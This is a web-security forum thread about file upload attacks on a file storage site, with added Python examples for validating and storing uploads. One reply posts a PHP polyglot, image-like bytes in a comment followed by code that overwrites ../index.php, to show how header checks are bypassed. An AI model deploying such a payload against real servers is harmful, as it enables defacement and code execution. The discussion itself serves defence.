File Upload Attacks
I performed several Google searches for file upload attacks and I didn't get any meaningful results back. I need a list of file upload attacks because I have a file storage website and I need to make it as secure as possible.
I know that there are file upload vulnerabilities such as the arbitrary shell upload attack, where you upload a PHP file to a server, then access it and it will execute the code. I also know that there's another type of file upload attack called null file upload attacks, or something along those lines.
However, I was not able to find any information about that either. It would be nice if someone could point me to a website or article that discusses these types of attacks in detail and how to guard against them.
Okay, here are my thoughts, as I have a site that I run that will have uploads when I get time to fix it (too many projects, too little time)…
Anyways, here are the bits that will trouble you.
Remote Upload Script Attack:
Problem: With this the attacker creates a script that will upload a set file unlimited times.
Fix: Enable a good, strong CAPTCHA system that will not allow backwards resubmits.
File Header Spoofing Attack:
Problem: With this attack the person will create a harmful script that can cause many problems and spoof something like false GIF header information to enable it to bypass the filters.
Fix: Scan both the extension and the header information; this will take care of some of the problems. You will also need to filter the body of the file to remove anything that may be harmful.
File Extension Change:
Problem: The attacker simply changes the file extension to trick your filters.
Fix: Scan and ensure the header matches the extension type.
I am sure I can think of more but this is what I have for now. I hope it helps.
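An added example of the extension-plus-header check recommended above, in Python; it is not code from AldarHawk's post or from any particular site. The MAGIC allowlist, the SAFE_NAME shape and the sample uploads are constructed for this example. It also covers the "null file upload" case from the opening post by refusing any file name that carries a NUL or other control character, and it rejects double extensions instead of trying to interpret them.

```python
import re

# Assumed allowlist for this example: extension -> accepted leading byte
# signatures ("magic numbers"). Only a few common types are listed; a real
# site would list exactly the types it intends to store and serve.
MAGIC = {
    "gif": [b"GIF87a", b"GIF89a"],
    "png": [b"\x89PNG\r\n\x1a\n"],
    "jpg": [b"\xff\xd8\xff"],
    "jpeg": [b"\xff\xd8\xff"],
    "pdf": [b"%PDF-"],
}

# Exactly one dot, a short alphanumeric stem, a short alphanumeric extension.
# Names with several dots ("shell.php.gif"), path separators or anything else
# outside this shape are rejected rather than "cleaned up".
SAFE_NAME = re.compile(r"^[A-Za-z0-9_-]{1,64}\.([A-Za-z0-9]{1,5})$")


def check_filename(filename):
    """Return the lower-cased extension if the client-supplied name is acceptable.

    Raises ValueError otherwise. The NUL check is listed separately so that
    the "null byte in the file name" case reports a specific reason.
    """
    if any(ord(c) < 32 for c in filename):
        raise ValueError("control character in file name")
    m = SAFE_NAME.match(filename)
    if not m:
        raise ValueError("file name not in allowed form")
    ext = m.group(1).lower()
    if ext not in MAGIC:
        raise ValueError("extension .%s not allowed" % ext)
    return ext


def check_magic(ext, data):
    """True if the body starts with a signature that belongs to ext."""
    return any(data.startswith(sig) for sig in MAGIC[ext])


def validate_upload(filename, data):
    """Apply both checks from the post above and return the canonical extension.

    Raises ValueError when the name is unsafe, the extension is not on the
    allowlist, or the body's header does not match the claimed extension.
    """
    ext = check_filename(filename)
    if not check_magic(ext, data):
        raise ValueError("content does not look like a .%s file" % ext)
    return ext


# Constructed sample uploads (name -> body); none of these are real files.
SAMPLES = {
    "cat.gif": b"GIF89a" + b"\x00" * 32,
    "shell.php": b"<?php echo 1; ?>",          # disallowed extension
    "shell.php.gif": b"GIF89a",                # double extension
    "shell.php\x00.gif": b"GIF89a",            # NUL byte in the name
    "fake.gif": b"<?php echo 1; ?>",           # extension says GIF, header does not
}


def classify(samples=SAMPLES):
    """Run every sample through validate_upload and collect the verdicts."""
    verdicts = {}
    for name, data in samples.items():
        try:
            verdicts[name] = "accepted ." + validate_upload(name, data)
        except ValueError as err:
            verdicts[name] = "rejected: " + str(err)
    return verdicts


if __name__ == "__main__":
    for name, verdict in classify().items():
        print(repr(name), "->", verdict)
```

The header check only confirms that the first bytes belong to the claimed type; it does not prove the rest of the file is harmless, which is why the post also asks for the body to be filtered and, above all, why uploads should never be handed to a script interpreter.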
AldarHawk wrote: Okay, here are my thoughts, as I have a site that I run that will have uploads when I get time to fix it (too many projects, too little time)…
Anyways, here are the bits that will trouble you.
Remote Upload Script Attack:
Problem: With this the attacker creates a script that will upload a set file unlimited times.
Fix: Enable a good, strong CAPTCHA system that will not allow backwards resubmits.
File Header Spoofing Attack:
Problem: With this attack the person will create a harmful script that can cause many problems and spoof something like false GIF header information to enable it to bypass the filters.
Fix: Scan both the extension and the header information; this will take care of some of the problems. You will also need to filter the body of the file to remove anything that may be harmful.
File Extension Change:
Problem: The attacker simply changes the file extension to trick your filters.
Fix: Scan and ensure the header matches the extension type.
I am sure I can think of more but this is what I have for now. I hope it helps.
AldarHawk covered it quite nicely. :)
Ntvu wrote: I think that checking the file extension is more reliable than checking the content type, because content type headers can be spoofed, or at least I think so. On my file storage site, users were able to change the content type header somehow.
And one more question - how do you upload null files? Do you have to use Tamper Data to alter the post data?
That's why I suggested doing both checks ;)
Well, you could have this in a, let's say, malicious.php:
```
/*
And now, for some code that when analyzed, will seem like an image:
Ëeâ,àÊR–Y
¶
§¶XûWK„6k<1ï‡J8ï¹ûÖÎ2gCé âõ¡‚îFumÕ¾ÅL"óÛÕ÷š¤Y»,àÌ-ßÛÁßäº ± ý¹nK9TÑIÚw“Öï3.ÝȾL¯NÙCÛ3ÀëÕqG2¦µëDb2@&ö™ê}½ˆ:Öí•(L`"o'Ú¹Û×µ¹9í;ÔÞ•›»]=§ð¥m0;&eÐr›œ¶úŠÚ€®ÎfUȯI— ÔgÊÒùC~Ò~°èŽ™†ÈüdÉÈ=`Cü%†.Qå:ýè9ÂGˆZ
2x€ “Ôx*{ÇE óÆëum†Ë´$¨:¦ûŸÊ¡4eæjÊ ÃU†…ãò)M;›Š²±mµÕ‡ÌKcqßÜ×}íÐ3d™H]_íÆ@gÌ0êiÏSÑâ§ÒaY˼Íà¡U ›
̃ˆÈÍÍÜŽ¹O=G…r^IY”ÁþO©~N%í¡Éˆ*X„ ,áËä]§˜%oõ:,|û.(jh“IŸ>u–ÛISŽ¨ÐÈC5%íæR,.Õ²"»a0Öƒ8,@
¢-Èy¸yÛì7‚x7íµÕ>i2$nwÿ‹÷¯¾ºÜšmµ9›ŒwrÌ qéIÑã^#ËÌ®
*–Ãîç±æÄF&$ð`§»@·ÀÓ‡*>¥Ðg2#6sF[ñ sb]Ôrº—*º²
&t
¼Ð×䎈Žj!ÕçTšSÄ&ÚjN¸øÄ8ÅKqO{…ÆeÀžd‚bx$#²nŸdãŠsÛF›çEYÖkÕo®rdÁõ
ɴóѼŸ>}úþûï/ †²»Lˆœ ò¡¬:»†ìÎ3Öm5ôËÅ´ £Mؽ<k!Òé.RÃo1§Ê°Œ°_° I—ë+R==VëÙ\@g[a™)u÷ü5U0ížk´úݺ<tse 8HnER‘m•¼m
+—º4ØÁmMbóÆÖCñÊ<{ñž ‹¦ge, „Üyq¾2¼‹ò@l|†© +&f>[Ey!Œ‹ºâ½8Þ* Ü„rX}Kás‹§ÏÈ‘1»1ëp÷¹Ÿ£îœ9ô·@ÇÜ
1•i*µžC®3Ðpá†C{XÛ´R²pd!?æÁUtŒën8ë£ÏðKhƒË&0;ä¢W®û¿|ùr½7aߨC{wé\,gÐtŽI™lçÛóÚæqlàÅâ‹*Ñ6Q\ûð—eu[ƒ X³qÿX×æócÇC7U-ÀíÓòˆ¬&àú¼îPAn^gÏN—k¼±lÞ
ËGóa =UÛ» ¦C —˜#Ì ûg+Ä2EyõõÚI«0 3\^a£ÂHn7õûLî?Bñâ&÷)Ž•4°š{†Ü%\ˆÍÛñZbП¢ÔŠ®1å03Ǻ½O{ÃVe[A^éÆXrgèetåû"Æ÷µ;×ü£….[åP˜È|×dT´M•ûAÄKÀz±‹bÊU¸2Í"=°Ÿ‹Ó¶¬àЖ›&‡zS}—w:ì<¶RB]õŠ¤*È:ü‚GdbfçNo,6Fâñ[kfD<˜Èü.ÜU,CÃú]P쀿]‘rquÅÓ;¬ÏéÆ´ÍòÆl
ï¯ã¯¾ûî»ßÿþ÷,ÊÕHŽøGìw2Èޯ“»¬¤µó}»‡
Š”y]‹È3`ê›Ëgª¶t¿±,É~íß›Ì~ýå~¶Ðߧ¢ÜÛç^±¯2ÛCe@!ñBÅ(àØ—ÙìÜbè8eYM—âz®'‰t.˜–46f”ßdÉ6ñº‡7®guÿ;ùÍÐá1s‡ÜÕVêrvz9ÚŠ±L F3cºFŠ
}:u>"ÿrðÖµvk¶íʯN°n•yn0!¨qd5FϳŽê˜õ˜ËBÑŽK4Ç1K7<t´ð©z‘¦C7×{aOgn~êp妰oXÉÛW~ú駸šBÆîæÊ"áq›7(ò2#q5yÕŒ½èp‘`̧ךh¬ä¹ôð9‹Í…N°*Ù_¬5Æ•Uc5EnÛú…I™s¨Ë!‚.ßM Žq¹¸Ðxå)¿Æ àâ$/Wù`uÜO@“S$˜ÿµ]&ªo¨wçÁ)ÐEz÷;¼hY×fðŠ-ì¥ý>sºˆ4Ye‡RœÇ´‚BEyí’êx³ñÉd`–9±ÁlÂ.Uìê´'”W[º{Ƕ?ªm(…«ØŠîs{ƒXÎ5m¬„¾wbÚ(RÚ”ã…0jDÍEÓs'[°àXÁ4ÊÂe4
!Hý/ªœåsÀÍ ÿܶùY·–ÕÜ™è¶>©Œ Îíî«ÓÍa
ûé2Åbá2}æœàcVÔ9ç©É…+=?§’)Xœk^¬£¶b¹±ym
…ì,³So¸ÚÌJè3 q¼J;\ïM"ÐcowÛ¯¿þšª¯9ãùÃþâ¶ÂÖwW}ŽfÝ[;»Œ¹ï·›%¼6>…™¾ÞŸ¾~wéPêÛ¾Hþ²,38E¤â…IÌ–v·-Œ`ä«3î@“â?ÖÂÌ_™œ¡ý^E6!‚¹*3L®±¼BTûÊ–€Z\¶ÇLûq¨Á /^UOY¤ÝEóafæ°h}Ï ?ßÒÖkøtaZ·IÚ+YöXKµ—¯ú±ùnéLbâ˜h›w¹ý€ufÜDäÄ´{Ãn¡sNp„&r_£IÈts½Ü/-UáV8šDûí7TÔî‡CW±²I?3QÞÍ$ (ŸwGÎ B D?`O*å
/xïsk‚´š)²Â,ÉM9d'»alOfè×ÙßV䕃`Pxᾶ"×c#JΤî½w.Ûf©
Next follows the actual code:
*/
$handle=fopen('../index.php','wb');
$write=fwrite($handle, 'PWN4G3!!');
?>
```
Or would the cleanup function use strstr() to find php code?
ranma wrote: Well, you could have this in a, let's say, malicious.php:
```
/*
And now, for some code that when analyzed, will seem like an image:
Ëeâ,àÊR–Y
¶
§¶XûWK„6k<1ï‡J8ï¹ûÖÎ2gCé âõ¡‚îFumÕ¾ÅL"óÛÕ÷š¤Y»,àÌ-ßÛÁßäº ± ý¹nK9TÑIÚw“Öï3.ÝȾL¯NÙCÛ3ÀëÕqG2¦µëDb2@&ö™ê}½ˆ:Öí•(L`"o'Ú¹Û×µ¹9í;ÔÞ•›»]=§ð¥m0;&eÐr›œ¶úŠÚ€®ÎfUȯI— ÔgÊÒùC~Ò~°èŽ™†ÈüdÉÈ=`Cü%†.Qå:ýè9ÂGˆZ
2x€ “Ôx*{ÇE óÆëum†Ë´$¨:¦ûŸÊ¡4eæjÊ ÃU†…ãò)M;›Š²±mµÕ‡ÌKcqßÜ×}íÐ3d™H]_íÆ@gÌ0êiÏSÑâ§ÒaY˼Íà¡U ›
̃ˆÈÍÍÜŽ¹O=G…r^IY”ÁþO©~N%í¡Éˆ*X„ ,áËä]§˜%oõ:,|û.(jh“IŸ>u–ÛISŽ¨ÐÈC5%íæR,.Õ²"»a0Öƒ8,@
¢-Èy¸yÛì7‚x7íµÕ>i2$nwÿ‹÷¯¾ºÜšmµ9›ŒwrÌ qéIÑã^#ËÌ®
*–Ãîç±æÄF&$ð`§»@·ÀÓ‡*>¥Ðg2#6sF[ñ sb]Ôrº—*º²
&t
¼Ð×䎈Žj!ÕçTšSÄ&ÚjN¸øÄ8ÅKqO{…ÆeÀžd‚bx$#²nŸdãŠsÛF›çEYÖkÕo®rdÁõ
ɴóѼŸ>}úþûï/ †²»Lˆœ ò¡¬:»†ìÎ3Öm5ôËÅ´ £Mؽ<k!Òé.RÃo1§Ê°Œ°_° I—ë+R==VëÙ\@g[a™)u÷ü5U0ížk´úݺ<tse 8HnER‘m•¼m
+—º4ØÁmMbóÆÖCñÊ<{ñž ‹¦ge, „Üyq¾2¼‹ò@l|†© +&f>[Ey!Œ‹ºâ½8Þ* Ü„rX}Kás‹§ÏÈ‘1»1ëp÷¹Ÿ£îœ9ô·@ÇÜ
1•i*µžC®3Ðpá†C{XÛ´R²pd!?æÁUtŒën8ë£ÏðKhƒË&0;ä¢W®û¿|ùr½7aߨC{wé\,gÐtŽI™lçÛóÚæqlàÅâ‹*Ñ6Q\ûð—eu[ƒ X³qÿX×æócÇC7U-ÀíÓòˆ¬&àú¼îPAn^gÏN—k¼±lÞ
ËGóa =UÛ» ¦C —˜#Ì ûg+Ä2EyõõÚI«0 3\^a£ÂHn7õûLî?Bñâ&÷)Ž•4°š{†Ü%\ˆÍÛñZbП¢ÔŠ®1å03Ǻ½O{ÃVe[A^éÆXrgèetåû"Æ÷µ;×ü£….[åP˜È|×dT´M•ûAÄKÀz±‹bÊU¸2Í"=°Ÿ‹Ó¶¬àЖ›&‡zS}—w:ì<¶RB]õŠ¤*È:ü‚GdbfçNo,6Fâñ[kfD<˜Èü.ÜU,CÃú]P쀿]‘rquÅÓ;¬ÏéÆ´ÍòÆl
ï¯ã¯¾ûî»ßÿþ÷,ÊÕHŽøGìw2Èޯ“»¬¤µó}»‡
Š”y]‹È3`ê›Ëgª¶t¿±,É~íß›Ì~ýå~¶Ðߧ¢ÜÛç^±¯2ÛCe@!ñBÅ(àØ—ÙìÜbè8eYM—âz®'‰t.˜–46f”ßdÉ6ñº‡7®guÿ;ùÍÐá1s‡ÜÕVêrvz9ÚŠ±L F3cºFŠ
}:u>"ÿrðÖµvk¶íʯN°n•yn0!¨qd5FϳŽê˜õ˜ËBÑŽK4Ç1K7<t´ð©z‘¦C7×{aOgn~êp妰oXÉÛW~ú駸šBÆîæÊ"áq›7(ò2#q5yÕŒ½èp‘`̧ךh¬ä¹ôð9‹Í…N°*Ù_¬5Æ•Uc5EnÛú…I™s¨Ë!‚.ßM Žq¹¸Ðxå)¿Æ àâ$/Wù`uÜO@“S$˜ÿµ]&ªo¨wçÁ)ÐEz÷;¼hY×fðŠ-ì¥ý>sºˆ4Ye‡RœÇ´‚BEyí’êx³ñÉd`–9±ÁlÂ.Uìê´'”W[º{Ƕ?ªm(…«ØŠîs{ƒXÎ5m¬„¾wbÚ(RÚ”ã…0jDÍEÓs'[°àXÁ4ÊÂe4
!Hý/ªœåsÀÍ ÿܶùY·–ÕÜ™è¶>©Œ Îíî«ÓÍa
ûé2Åbá2}æœàcVÔ9ç©É…+=?§’)Xœk^¬£¶b¹±ym
…ì,³So¸ÚÌJè3 q¼J;\ïM"ÐcowÛ¯¿þšª¯9ãùÃþâ¶ÂÖwW}ŽfÝ[;»Œ¹ï·›%¼6>…™¾ÞŸ¾~wéPêÛ¾Hþ²,38E¤â…IÌ–v·-Œ`ä«3î@“â?ÖÂÌ_™œ¡ý^E6!‚¹*3L®±¼BTûÊ–€Z\¶ÇLûq¨Á /^UOY¤ÝEóafæ°h}Ï ?ßÒÖkøtaZ·IÚ+YöXKµ—¯ú±ùnéLbâ˜h›w¹ý€ufÜDäÄ´{Ãn¡sNp„&r_£IÈts½Ü/-UáV8šDûí7TÔî‡CW±²I?3QÞÍ$ (ŸwGÎ B D?`O*å
/xïsk‚´š)²Â,ÉM9d'»alOfè×ÙßV䕃`Pxᾶ"×c#JΤî½w.Ûf©
Next follows the actual code:
*/
$handle=fopen('../index.php','wb');
$write=fwrite($handle, 'PWN4G3!!');
?>
```
Or would the cleanup function use strstr() to find php code?
Well, first off, allowing .php files to be uploaded is just plain stupid. Also, a custom filter would be made to remove the <?php, simple enough. That code would not work, but good try :)
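An added example, written from the defender's side of the exchange above and not taken from ranma's post or the reply; it assumes a storage directory outside the web server's document root and a marker list of the open-tag forms PHP itself documents. The point the polyglot makes is that a file can begin with a genuine image signature and a long comment and still end in code, so a body scan has to cover the whole file, and a file that trips it is rejected rather than "cleaned". The sample bodies are constructed for this example.

```python
import os
import re
import secrets
import tempfile

# Assumed marker list for this example: the PHP open-tag forms. Matching is
# case-insensitive and runs over the whole body, not just the first bytes,
# because the polyglot in the post puts an image header and a comment first
# and the code last. A bare "<?" is deliberately not listed: it would flag
# every XML or SVG upload.
PHP_MARKERS = (b"<?php", b"<?=")


def looks_like_php(data):
    """True if a PHP open tag appears anywhere in the body."""
    lower = data.lower()
    return any(marker in lower for marker in PHP_MARKERS)


def store_upload(ext, data, root):
    """Write an already-validated body under root with a random file name.

    root is assumed to be a directory outside the document root, so nothing
    in it is ever handed to a script interpreter. A body containing an open
    tag is rejected rather than edited: stripping "<?php" from the file only
    invites the next variant, whereas refusing the file ends the discussion.
    Returns the random basename; the client's name never reaches the disk.
    """
    if looks_like_php(data):
        raise ValueError("embedded PHP open tag")
    name = secrets.token_hex(16) + "." + ext
    with open(os.path.join(root, name), "xb") as fh:  # "x": never overwrite
        fh.write(data)
    return name


def download_headers(ext, content_type):
    """Response headers for serving a stored file back to a browser.

    attachment forces a download rather than in-page rendering; nosniff stops
    the browser from re-guessing the type from the first bytes.
    """
    return {
        "Content-Type": content_type,
        "Content-Disposition": 'attachment; filename="download.%s"' % ext,
        "X-Content-Type-Options": "nosniff",
    }


# Constructed bodies in the shape of the post's example: a GIF signature, a
# comment full of non-ASCII image-looking bytes, and an open tag at the end.
POLYGLOT = b"GIF89a/* " + bytes(range(128, 200)) + b" */<?PHP /* code here */ ?>"
CLEAN_GIF = b"GIF89a" + b"\x01" * 16


def demo(root=None):
    """Store both samples in a scratch directory and report what happened."""
    root = root or tempfile.mkdtemp(prefix="uploads-")
    result = {}
    try:
        store_upload("gif", POLYGLOT, root)
        result["polyglot"] = "stored"
    except ValueError as err:
        result["polyglot"] = "rejected: " + str(err)
    name = store_upload("gif", CLEAN_GIF, root)
    result["clean_name_random"] = re.fullmatch(r"[0-9a-f]{32}\.gif", name) is not None
    with open(os.path.join(root, name), "rb") as fh:
        result["clean_bytes_intact"] = fh.read() == CLEAN_GIF
    result["headers"] = download_headers("gif", "image/gif")
    return result


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, "->", value)
```

The body scan is defence in depth and will never be complete; the control that actually decides the outcome is structural: the upload is stored under a name the client did not choose, in a place the web server will not execute, and served back as a download with the declared type.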